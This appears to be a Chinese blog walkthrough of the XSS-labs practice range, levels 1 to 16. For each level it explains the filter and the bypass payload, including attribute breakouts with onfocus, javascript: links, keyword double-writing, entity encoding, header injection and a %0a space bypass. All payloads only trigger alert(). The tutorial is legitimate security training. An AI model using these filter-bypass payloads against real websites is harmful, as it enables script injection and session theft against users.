双层小牛堡

XSS-labs

XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客

该补习补习xss漏洞了

漏洞原理

网站存在静态和动态网站

xss 针对的网站就是动态网站

动态网站

会根据 用户的环境  与 需求 反馈出 不同的响应


静态页面 

代码写死了  只会存在代码中有的内容

通过动态网站用户体验会大大加深但是会存在漏洞 xss

XSS 是一种注入漏洞

通过用户输入 在代码页中插入 恶意语句 从而实现注入

攻击成功 可以获取但不止 COOKIE 会话 和 隐私页面

首先我们来看看最简单

然后我们通过 get 传递漏洞

xss需要通过php的输出指令来输出

我们通过做题目来继续了解吧

打开靶场

Level1 【无过滤】

我们能发现这三个地方

然后我们回去看看源代码

能发现我们输入什么他就存储在源代码什么

这里就是动态的

如果和sql注入一样我们插入恶意代码呢



这里通过 alert 来弹窗

这里 script 表示 JavaScript代码 / 表示结束了



那么这里插入后

欢迎用户test1


就变为了


欢迎用户test1



实现了 alert 弹窗

我们就实现了第一题

Level2 【参数】

我们依然看看源代码

这里我们发现了我们输入的值被当做参数了

value="1">

这里我们就想到了 sql注入的闭合了

"> 就会实现xss注入

所以payload 就是

">

">  <"

PHNjcmlwdD5hbGVydCgpPC9zY3JpcHQ+ 为 <sricpt>alert()</sricpt></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" target="_blank"><img alt="XSS-labs_第7张图片" height="184" src="http://img.e-com-net.com/image/info8/f91c5b2805ed434ca32d54826bcfa661.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p></p> 
  <h2>Level3   【htmlspecialchars】</h2> 
  <p>我们查看代码 没有发现和上一题有什么不一样的</p> 
  <p>所以我们去继续使用上题的payload</p> 
  <pre><code>"><script>alert(1)</script></code></pre> 
  <p> <a href="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" target="_blank"><img alt="XSS-labs_第8张图片" height="122" src="http://img.e-com-net.com/image/info8/38472eed682542b096488062d0f23e14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现被实体化了</p> 
  <p>并且只过滤了  <></p> 
  <p>这里我们就需要想到是htmlspecialchars</p> 
  <p>我们去看xsslab源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" target="_blank"><img alt="XSS-labs_第9张图片" height="138" src="http://img.e-com-net.com/image/info8/ea44a4f21ee1422c959a9f1ab416eea8.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>确实是这样</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" target="_blank"><img alt="XSS-labs_第10张图片" height="396" src="http://img.e-com-net.com/image/info8/9e51e959e62648ad82bd36f9a4d2270b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里其实预定义了转义的内容  因为单引号没有被转义 但是其实可以实现的</p> 
  <pre><code>&：转换为&amp;
"：转换为&quot;
'：转换为成为 '
<：转换为&lt;
>：转换为&gt;
</code></pre> 
  <p>发现就是为了让 <>里面的转变为字符串 失去闭合作用</p> 
  <h3>单引号绕过</h3> 
  <p>这里我们需要通过 ' 绕过</p> 
  <pre><code>因为我们的<> 会被实体化

所以我们需要运用不需要<>的payload

我们可以利用 onfocus 事件
</code></pre> 
  <h3>onfocus事件</h3> 
  <pre><code>当 页面中存在 输入框等 需要存在点击的界面时

onfocus 就可以被触发

</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" target="_blank"><img alt="XSS-labs_第11张图片" height="157" src="http://img.e-com-net.com/image/info8/6336cecbd77c4f529b405841bb36ef5b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>这里就存在一个很明显的例子</p> 
  <p>既然 onfocus可以出发函数 那么我们就可以通过执行</p> 
  <p>这里就可以写入payload</p> 
  <pre><code>onfocus=javascript:alert()</code></pre> 
  <p>这样就可以绕过 过滤 <></p> 
  <p>那我们如何执行呢</p> 
  <pre><code>我们输入一个 ' 时

变成了下面这个
value="" '="">



我们输入 'abcd'

变为了

value="" abcd''="">


我们输入 payload

' onfocus=javascript:alert(1) ' 

就会变为

value=""  onfocus=javascript:alert(1) '' ="">

从而实现了闭合</code></pre> 
  <p>所以最终payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level4   【过滤><】</h2> 
  <p>我们首先可以判断是否存在过滤</p> 
  <pre><code>'"&<></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" target="_blank"><img alt="XSS-labs_第12张图片" height="116" src="http://img.e-com-net.com/image/info8/d8d3a978174641e98fe77c5e9010e380.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现只有3个了 过滤了 <></p> 
  <p>用上题目的payload</p> 
  <pre><code>' onfocus=javascript:alert(1) '</code></pre> 
  <p>失效了</p> 
  <p>我们看看代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" target="_blank"><img alt="" height="83" src="http://img.e-com-net.com/image/info8/94ee30b14a594c2b99b347bec981e859.jpg" width="569"></a></p> 
  <p>进行修改payload</p> 
  <pre><code>" onfocus=javascript:alert(1) '</code></pre> 
  <h2>Level5   【过滤script】</h2> 
  <p>我们使用第一题的payload直接上去</p> 
  <p><a href="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" target="_blank"><img alt="" height="65" src="http://img.e-com-net.com/image/info8/b7e9e68a09c34d55acd67189188b62d0.jpg" width="282"></a></p> 
  <p>发现 script 变为了 scr_ipt</p> 
  <p>我们去看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" target="_blank"><img alt="XSS-labs_第13张图片" height="161" src="http://img.e-com-net.com/image/info8/a2df0926a3c646f3b7bedb9d66845e7d.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现过滤了 on 和 script</p> 
  <p>所以我们使用其他方式</p> 
  <h3>a herf</h3> 
  <pre><code><html
<p>123</p>
<a href=javascript:alert("yes")>xxxxxx</a>
</html></code></pre> 
  <p>我们先给出payload</p> 
  <p>然后我们解释一下</p> 
  <p><a href="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" target="_blank"><img alt="XSS-labs_第14张图片" height="132" src="http://img.e-com-net.com/image/info8/3edd6c52305a4df8b6438905044ddaf2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过 a标签 然后点击 我们可以实现跳转等操作</p> 
  <p>既然可以实现跳转 那我们也可以实现 执行JavaScript命令</p> 
  <p>我们开始做题</p> 
  <p>我们先传入内容</p> 
  <pre><code><a href=javascript:alert()>xxxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" target="_blank"><img alt="" height="69" src="http://img.e-com-net.com/image/info8/602016a767264a078ce5403fb0189470.jpg" width="454"></a></p> 
  <p>我们需要闭合 所以修改paylaod</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" target="_blank"><img alt="XSS-labs_第15张图片" height="103" src="http://img.e-com-net.com/image/info8/d246f7e90bb246afb2a98b489f1fb2f2.jpg" width="358" style="border:1px solid black;"></a></p> 
  <p>还需要将后面的 "> 闭合</p> 
  <p>所以最后的payload为</p> 
  <pre><code>"> <a href=javascript:alert()>xxxxx</a> <"</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" target="_blank"><img alt="XSS-labs_第16张图片" height="181" src="http://img.e-com-net.com/image/info8/508794bdc4534840b99118d6eac46a42.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>点击即可实现</p> 
  <h2>Level6   【过滤 a href】</h2> 
  <p>我们把上面的 payload 丢进去看看</p> 
  <p><a href="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" target="_blank"><img alt="" height="77" src="http://img.e-com-net.com/image/info8/99774aa8574e4d46b8449cc7d6beef8f.jpg" width="530"></a></p> 
  <p>发现 过滤 了 a href</p> 
  <p><a href="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" target="_blank"><img alt="XSS-labs_第17张图片" height="200" src="http://img.e-com-net.com/image/info8/9f0f26a01d754501bb5cb7f7fd0d0442.png" width="500" style="border:1px solid black;"></a></p> 
  <p>但是放出来了 大小写 所以我们可以</p> 
  <h3>大小写绕过</h3> 
  <p>"> <ScRipt>alert()</ScRipt> <"</p> 
  <p>或者</p> 
  <p>"> <a HrEf=javascript:alert()>xxxx</a> <"</p> 
  <p>又或者</p> 
  <p>" Onfocus=javascript:alert() "</p> 
  <h2>Level7  【替换为空】</h2> 
  <p>我们先上关键词看看</p> 
  <pre><code>" Onfocus <ScRipt> <a Href=javascript:alert()></code></pre> 
  <p>能发现返回值是</p> 
  <p><a href="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" target="_blank"><img alt="" height="66" src="http://img.e-com-net.com/image/info8/486dc7e708fd4b57a34c6f80fb07b8de.jpg" width="380"></a></p> 
  <pre><code>" focus <> <a =java:alert()></code></pre> 
  <p>全部替换为空了</p> 
  <p>这里我们使用</p> 
  <h3>双写绕过</h3> 
  <p>开始构造</p> 
  <pre><code>" OOnnfocus=javascscriptript:alert() "

"> <a hrhrefef=javascscriptript:alert()>xx</a> <"</code></pre> 
  <h2>Level8   【a href标签自动url解码】</h2> 
  <p>更新一下 关键词</p> 
  <pre><code>" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()></code></pre> 
  <p>看看过滤了啥</p> 
  <p><a href="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" target="_blank"><img alt="XSS-labs_第18张图片" height="148" src="http://img.e-com-net.com/image/info8/a710508f5f4d45cbb4fc72d85bbc407a.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" target="_blank"><img alt="XSS-labs_第19张图片" height="225" src="http://img.e-com-net.com/image/info8/4b6749ba585b4147b1e4fb901fcdd430.png" width="579" style="border:1px solid black;"></a></p> 
  <p>这里为什么我们无法直接通过input来xss 因为存在 htmlspecialchars函数 会吧我们输入的内容</p> 
  <p>直接作为字符串输出</p> 
  <p><a href="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" target="_blank"><img alt="XSS-labs_第20张图片" height="109" src="http://img.e-com-net.com/image/info8/677adc0da54f4f28981aca0ff4cbf077.jpg" width="584" style="border:1px solid black;"></a></p> 
  <p>引号被过滤了 无法实现闭合</p> 
  <p></p> 
  <p>所以没有用了</p> 
  <p>我们需要通过下面的 a href标签输出了</p> 
  <p>但是下面又存在过滤</p> 
  <p>我们如何实现呢</p> 
  <p>其实</p> 
  <h4>a href 存在自动解密 url的功能</h4> 
  <p>所以我们只需要通过编码绕过 过滤 如何通过 a href 编码执行即可</p> 
  <pre><code>javascript:alert()


&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;


unicode编码</code></pre> 
  <p>直接输入即可</p> 
  <p>然后点击 友情链接即可</p> 
  <h2>Level9   【判断http在不在标签内】</h2> 
  <p>我们看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" target="_blank"><img alt="XSS-labs_第21张图片" height="156" src="http://img.e-com-net.com/image/info8/baa19d63c0c84c9c878e01c000bffe14.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>strpos 查看 http://是否在 输入里面 如果不在 输出不合法</p> 
  <p>这里就好办了</p> 
  <p>我们通过注释输入http://即可</p> 
  <p>运用上一道题目的payload</p> 
  <pre><code>&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41; /* http:// */</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" target="_blank"><img alt="XSS-labs_第22张图片" height="136" src="http://img.e-com-net.com/image/info8/6e1c6a1548b247ee87a18109e835c4a8.jpg" width="574" style="border:1px solid black;"></a></p> 
  <p>这里就看到 http:// 是被注释掉了</p> 
  <h2 style="background-color:transparent;">Level10 【闭合 fake hidden】</h2> 
  <p>看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" target="_blank"><img alt="XSS-labs_第23张图片" height="212" src="http://img.e-com-net.com/image/info8/350b904aa5a84717a68eacc19adbbf53.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>发现需要另一个来传递</p> 
  <p>我们这里并且过滤了 <></p> 
  <p>但是其实还是很简单的</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" target="_blank"><img alt="XSS-labs_第24张图片" height="365" src="http://img.e-com-net.com/image/info8/6c537bbeda4f4747842072783b57eca7.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2> Level11  【Referer注入】</h2> 
  <p>我们再来看看源代码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" target="_blank"><img alt="XSS-labs_第25张图片" height="266" src="http://img.e-com-net.com/image/info8/4ec00b5cae824b05a8befd87b28195c6.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p>通过referer</p> 
  <p>为什么无法通过 t_sort</p> 
  <p>因为 htmlspecialchars 无法闭合 " 会被实体化</p> 
  <p>所以我们通过 referer来进行 xss</p> 
  <p>referer 的内容 就和 上面一样</p> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" target="_blank"><img alt="XSS-labs_第26张图片" height="207" src="http://img.e-com-net.com/image/info8/36627141a66649308f28955d10518690.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" target="_blank"><img alt="XSS-labs_第27张图片" height="412" src="http://img.e-com-net.com/image/info8/798f24db0b2e49e483059ab23615b36f.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2 style="background-color:transparent;">Level12 【UA注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" target="_blank"><img alt="XSS-labs_第28张图片" height="239" src="http://img.e-com-net.com/image/info8/7b270c86d68543b5992c04257c464c1b.jpg" width="650" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" target="_blank"><img alt="XSS-labs_第29张图片" height="409" src="http://img.e-com-net.com/image/info8/e3beac2944e84fd6a2b1afe4cf77e3d2.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level13 【cookie注入】</h2> 
  <pre><code class="hljs">" onfocus=javascript:alert() " type=text</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" target="_blank"><img alt="XSS-labs_第30张图片" height="350" src="http://img.e-com-net.com/image/info8/c42c349025ff4912b2641b9c1e1158bd.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level14  【通过图片属性实现xss】</h2> 
  <p>这里我的小皮环境有问题 无法实现文件上传</p> 
  <p>这里 主要就是通过 图片的属性解析 然后我们写入 xss语句</p> 
  <p>这样就会报错</p> 
  <p>[靶场] XSS-Labs 14-20_3hex的博客-CSDN博客</p> 
  <h2>Level15   【通过src访问文件执行】</h2> 
  <p>这里的意思就是src是访问了 一个图片</p> 
  <p>那我们可以通过这个src访问第一题的php 然后通过 第一题的php来执行</p> 
  <p>但是我还是无法实现 可能我php没开启属性</p> 
  <p>xss-labs靶场实战全通关详细过程（xss靶场详解）-CSDN博客</p> 
  <h2>Level16   【绕过空格】</h2> 
  <p>XSS常见的触发标签_xss标签_H3rmesk1t的博客-CSDN博客</p> 
  <p><a href="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" target="_blank"><img alt="XSS-labs_第31张图片" height="189" src="http://img.e-com-net.com/image/info8/52cd5b797c2c4575b8ae79fcf11e967c.png" width="460" style="border:1px solid black;"></a></p> 
  <p>查看代码</p> 
  <p>发现过滤了 空格 和 /</p> 
  <p>首先就是查找一个不需要/的触发标签</p> 
  <p>这里我选择</p> 
  <pre><code class="hljs"><video><source onerror="alert(1)"></code></pre> 
  <p>其次需要绕过空格</p> 
  <p>我们可以首先看看 这两个空格是什么编码</p> 
  <p><a href="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" target="_blank"><img alt="XSS-labs_第32张图片" height="630" src="http://img.e-com-net.com/image/info8/06be95b52b5244e8b1287ec478b7786d.jpg" width="539" style="border:1px solid black;"></a></p> 
  <p>那么这里面我们可以使用 %0a绕过</p> 
  <p>所以payload就是</p> 
  <pre><code class="hljs"><video><source%0Aonerror="alert(1)"></code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" target="_blank"><img alt="XSS-labs_第33张图片" height="544" src="http://img.e-com-net.com/image/info8/8abec2205a354952b6dbaf6d730973b9.jpg" width="650" style="border:1px solid black;"></a></p> 
  <h2>Level17</h2> 
  <p>后面是 flash的插件了</p> 
  <p>我觉得没有必要做了 因为现在 flash已经被大多数浏览器抛弃了</p> 
  <p></p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1708452222792183808"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(WEB,xss,安全,前端)</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1891587755985661952.htm"
                           title="网络软件架构设计与架构风格深入解析.zip" target="_blank">网络软件架构设计与架构风格深入解析.zip</a>
                        <span class="text-muted">满天乱走</span>

                        <div>本文还有配套的精品资源，点击获取简介：《架构风格与基于网络的软件架构设计》一书提供了关于如何构建高效、可扩展网络系统的重要见解。文档详细介绍了架构风格的核心概念及其在网络软件设计中的应用，包括分布式系统特性的考量、可扩展性策略、安全性、性能优化和维护性等方面。本书通过分析如客户端-服务器、SOA和微服务等架构风格，指导开发者理解并复用成功的设计模式，同时强调安全性和性能优化在架构设计中的重要性，最</div>
                    </li>
                    <li><a href="/article/1891587756908408832.htm"
                           title="使用 Shiro 和 JPA 结合 MySQL 实现一个简易权限管理系统" target="_blank">使用 Shiro 和 JPA 结合 MySQL 实现一个简易权限管理系统</a>
                        <span class="text-muted">Java猿_</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>1.项目设置首先，确保你的项目已经配置好Maven或Gradle依赖管理工具，并添加以下依赖：Maven依赖org.apache.shiroshiro-core1.9.0org.apache.shiroshiro-web1.9.0org.springframework.bootspring-boot-starter-data-jpamysqlmysql-connector-java8.0.26or</div>
                    </li>
                    <li><a href="/article/1891584857507688448.htm"
                           title="关于前后端分离跨域问题——使用DeepSeek分析查错" target="_blank">关于前后端分离跨域问题——使用DeepSeek分析查错</a>
                        <span class="text-muted">潮落拾贝</span>
<a class="tag" taget="_blank" href="/search/%E8%A7%A3%E5%86%B3%E8%B7%A8%E5%9F%9F%E9%97%AE%E9%A2%98/1.htm">解决跨域问题</a><a class="tag" taget="_blank" href="/search/%E4%BD%BF%E7%94%A8DeepSeek%E5%8D%8F%E5%8A%A9%E5%BC%80%E5%8F%91/1.htm">使用DeepSeek协助开发</a>
                        <div>我前端使用antdesignvuepro框架，后端使用kratos框架开发。因为之前也解决过跨域问题，正常是在后端的http请求中加入中间件，设置跨域需要通过的字段即可，代码如下所示：funcNewHTTPServer(c*conf.Server,s*conf.Secret,rolesm*service.RolesManageService,tracertrace.TracerProvider,l</div>
                    </li>
                    <li><a href="/article/1891582336714207232.htm"
                           title="python股票分析系统部署操作过程及代码实现" target="_blank">python股票分析系统部署操作过程及代码实现</a>
                        <span class="text-muted">大懒猫软件</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/flask/1.htm">flask</a><a class="tag" taget="_blank" href="/search/plotly/1.htm">plotly</a><a class="tag" taget="_blank" href="/search/api/1.htm">api</a><a class="tag" taget="_blank" href="/search/restful/1.htm">restful</a>
                        <div>部署一个股票分析系统涉及多个步骤，包括后端服务、前端界面和实时数据更新。以下是一个详细的部署过程，涵盖从代码编写到服务器部署的完整步骤。1.系统架构概述后端：使用Flask提供RESTfulAPI和数据处理服务。前端：使用PlotlyDash构建动态界面，实时显示股票价格走势。数据源：从金融数据API（如AlphaVantage、YahooFinance）获取实时数据。2.系统开发步骤2.1安装必</div>
                    </li>
                    <li><a href="/article/1891581571861901312.htm"
                           title="redis结合lua脚本解决多线程并发安全问题" target="_blank">redis结合lua脚本解决多线程并发安全问题</a>
                        <span class="text-muted">练川</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a><a class="tag" taget="_blank" href="/search/lua/1.htm">lua</a><a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
                        <div>文章目录前言原子性单线程模型总结前言我们知道，多线程并发访问共享数据的时候，可能会造成并发安全问题，这是由于并发时多个线程相互穿插造成的问题；可以通过加锁，使得多个线程串行执行解决。当访问的是redis中的共享数据时，除了可以通过加锁解决，还可以使用lua脚本解决。本文针对redis结合lua脚本解决多线程并发安全问题，记录下个人的理解。原子性首先何为原子性？原子性是指操作不可分割，要么全部执行成</div>
                    </li>
                    <li><a href="/article/1891571608515047424.htm"
                           title="spring boot的约定大于配置" target="_blank">spring boot的约定大于配置</a>
                        <span class="text-muted">猿二哈</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                        <div>约定大于配置是一种系统设计思想（软件设计的范式），它能够帮助我们免去许多在写程序时需要配置且只需要配置一次的操作（减少对配置项的维护，）springboot就是基于这种思想下的产物，（类似spring框架下的脚手架，能够快速开发基于spring下的应用程序）（免去了在开发应用程序时只需配置一次的操作，比如维护web.xml文件，dispatchservelet（springMVC中的文件）文件，应</div>
                    </li>
                    <li><a href="/article/1891570599508111360.htm"
                           title="爬虫实践——selenium、bs4" target="_blank">爬虫实践——selenium、bs4</a>
                        <span class="text-muted">lucky_chaichai</span>
<a class="tag" taget="_blank" href="/search/Python%E7%88%AC%E8%99%AB/1.htm">Python爬虫</a><a class="tag" taget="_blank" href="/search/selenium/1.htm">selenium</a><a class="tag" taget="_blank" href="/search/requests/1.htm">requests</a><a class="tag" taget="_blank" href="/search/%E7%88%AC%E8%99%AB/1.htm">爬虫</a><a class="tag" taget="_blank" href="/search/selenium/1.htm">selenium</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a>
                        <div>目录一、浏览器的一般设置二、打开网页并获取网页源码的方式1、基于requests库2、基于urlib库3、基于selenium三、HTML解析1、BeautifulSoup2、Selenium动态渲染爬虫：模拟动态操作网页，加载JS(webdriver)3、scrapy框架四、反爬虫操作五、一些常见的异常处理六、url接口调用问题——get、post操作1、get请求2、post请求fromsel</div>
                    </li>
                    <li><a href="/article/1891569081937620992.htm"
                           title="selenium驱动Edge报错解决办法" target="_blank">selenium驱动Edge报错解决办法</a>
                        <span class="text-muted">Dream D</span>
<a class="tag" taget="_blank" href="/search/selenium/1.htm">selenium</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/edge/1.htm">edge</a>
                        <div>selenium驱动Edge报错解决办法selenium使用Edge运行时报错Message:‘MicrosoftWebDriver.exe’executableneedstobeinPATH//Anhighlightedblockselenium.common.exceptions.WebDriverException:Message:'MicrosoftWebDriver.exe'execut</div>
                    </li>
                    <li><a href="/article/1891566681826848768.htm"
                           title="网络安全-攻击流程-应用层" target="_blank">网络安全-攻击流程-应用层</a>
                        <span class="text-muted">星河776(重名区分)</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>应用层攻击针对OSI模型的第七层（应用层），主要利用协议漏洞、业务逻辑缺陷或用户交互弱点，直接威胁Web应用、API、数据库等服务。以下是常见应用层攻击类型及其流程，以及防御措施：1.SQL注入（SQLInjection）攻击流程：漏洞探测：攻击者向输入字段（如登录框、搜索栏）提交试探性SQL语句（如'OR1=1--）。语句构造：若应用未过滤输入，恶意SQL语句被拼接至数据库查询中。数据窃取/篡改</div>
                    </li>
                    <li><a href="/article/1891563911170289664.htm"
                           title="uniapp uni-icons组件自定义图标" target="_blank">uniapp uni-icons组件自定义图标</a>
                        <span class="text-muted">xcLeigh</span>
<a class="tag" taget="_blank" href="/search/uniapp%E6%8A%80%E6%9C%AF%E7%82%B9%E8%A7%A3%E6%9E%90/1.htm">uniapp技术点解析</a><a class="tag" taget="_blank" href="/search/uni-app/1.htm">uni-app</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>文章目录1️⃣uni-icons组件1.1引用位置1.2FontEditor简介1.2FontEditor使用结束语优质源码分享uni-app是一个使用Vue.js(opensnewwindow)开发所有前端应用的框架，开发者编写一套代码，可发布到iOS、Android、Web（响应式）、以及各种小程序、快应用等多个平台。1️⃣uni-icons组件1.1引用位置1.2FontEditor简介Fo</div>
                    </li>
                    <li><a href="/article/1891563533074755584.htm"
                           title="uniapp 可视化开发_dragUI 基于uni的可拖拽可视化编程web模板" target="_blank">uniapp 可视化开发_dragUI 基于uni的可拖拽可视化编程web模板</a>
                        <span class="text-muted">weixin_39644021</span>
<a class="tag" taget="_blank" href="/search/uniapp/1.htm">uniapp</a><a class="tag" taget="_blank" href="/search/%E5%8F%AF%E8%A7%86%E5%8C%96%E5%BC%80%E5%8F%91/1.htm">可视化开发</a>
                        <div>更新记录1.0.1(2019-12-02)忘了搞colorUI的模板，会导致下载项目后找不到样式的问题。更新了README添加了演示视频1.0.0(2019-12-01)2019/12/1更新代码注释，说明查看更多dragUI文档目录hope用于UNI可拖拽可视化编程在线演示demo地址一个简单创建helloworld界面的视频,github不会放视频，放在bilibli了dragUI演示视频效果</div>
                    </li>
                    <li><a href="/article/1891562766355984384.htm"
                           title="银河麒麟系统V10（arm版）离线安装postgresql说明" target="_blank">银河麒麟系统V10（arm版）离线安装postgresql说明</a>
                        <span class="text-muted">爱T小毛驴</span>
<a class="tag" taget="_blank" href="/search/arm%E5%BC%80%E5%8F%91/1.htm">arm开发</a><a class="tag" taget="_blank" href="/search/postgresql/1.htm">postgresql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>#银河麒麟系统#,#arm版操作系统）#随着2024年微软全球蓝屏丑闻的出现，系统安全越来越重要。目前很多企业开始尝试国产化操作系统上，本文介绍如何在国产化银河麒麟系统V10（arm）版上安装postgresql数据库，方便后续程序开发和环境部署。本资源使用的是arm版本的postgresql的docker镜像，能够在arm版国产化银河麒麟系统上进行安装。安装步骤如下：（1）导入镜像文件（找到po</div>
                    </li>
                    <li><a href="/article/1891557347327799296.htm"
                           title="VMware安全从我做起，vCenter和Esxi端口加固建议方案" target="_blank">VMware安全从我做起，vCenter和Esxi端口加固建议方案</a>
                        <span class="text-muted">虚拟化爱好者</span>
